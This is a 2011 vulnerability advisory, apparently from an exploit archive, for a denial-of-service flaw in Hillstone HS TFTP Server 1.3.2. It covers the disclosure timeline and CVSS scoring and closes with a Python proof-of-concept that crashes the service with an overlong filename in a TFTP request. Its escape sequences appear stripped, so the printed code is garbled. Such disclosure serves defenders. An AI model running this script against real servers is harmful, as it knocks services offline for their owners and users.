Home / exploitsPDF  

Hillstone Software HS TFTP Server Denial Of Service

Posted on 02 December 2011

##############################################################################
# Title : Hillstone Software HS TFTP Server Denial Of Service Vulnerability
# Author : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor : http://www.hillstone-software.com/hs_tftp_details.htm
# Advisory : http://secpod.org/blog/?p=419
# http://secpod.org/advisories/SecPod_Hillstone_Software_HS_TFTP_Server_DoS.txt
# http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py
# Version : Hillstone Software HS TFTP 1.3.2
# Date : 02/12/2011
##############################################################################

SecPod ID: 1031 21/09/2011 Issue Discovered
 04/10/2011 Vendor Notified
 No Response from Vendor
 02/12/2011 Advisory Released

Class: Denial Of Service Severity: Medium

Overview:
---------
Hillstone Software HS TFTP Server version 1.3.2 is prone to a denial of
service vulnerability.

Technical Description:
----------------------
The vulnerability is caused due to improper validation of WRITE/READ Request
Parameter containing long file name, which allows remote attackers to crash
the service.

Impact:
--------
Successful exploitation could allow an attacker to cause denial of service
condition.

Affected Software:
------------------
Hillstone Software HS TFTP 1.3.2

Tested on:
-----------
Hillstone Software HS TFTP 1.3.2 on Windows XP SP3 & Win 7.
Older versions might be affected.

References:
-----------
http://secpod.org/blog/?p=419
http://www.hillstone-software.com/index.htm
http://www.hillstone-software.com/hs_tftp_details.htm
http://secpod.org/advisories/SecPod_Hillstone_Software_HS_TFTP_Server_DoS.txt
http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py

Proof of Concept:
----------------
http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py

Solution:
----------
Not available

Risk Factor:
-------------
 CVSS Score Report:
 ACCESS_VECTOR = NETWORK
 ACCESS_COMPLEXITY = LOW
 AUTHENTICATION = NOT_REQUIRED
 CONFIDENTIALITY_IMPACT = NONE
 INTEGRITY_IMPACT = NONE
 AVAILABILITY_IMPACT = PARTIAL
 EXPLOITABILITY = PROOF_OF_CONCEPT
 REMEDIATION_LEVEL = UNAVAILABLE
 REPORT_CONFIDENCE = CONFIRMED
 CVSS Base Score = 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
 Risk factor = Medium

POC :
======

import socket,sys,time

port = 69
target = raw_input("Enter host/target ip address: ")

if not target:
 print "Host/Target IP Address is not specified"
 sys.exit(1)

print "you entered ", target

try:
 socket.inet_aton(target)
except socket.error:
 print "Invalid IP address found ..."
 sys.exit(1)

try:
 sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
 print "socket() failed"
 sys.exit(1)

## File name >= 222 length leads to crash
exploit = "x90" * 2222

mode = "binary"
print "File name WRITE/READ crash"

## WRITE command = x00x02
data = "x00x02" + exploit + "" + mode + ""

## READ command = x00x01
## data = "x00x01" + exploit + "" + mode + ""

sock.sendto(data, (target, port))
time.sleep(2)
sock.close()
try:
 sock.connect()
except:
 print "Remote TFTP server port is down..."
 sys.exit(1)

 

TOP

Malware :

Exploits :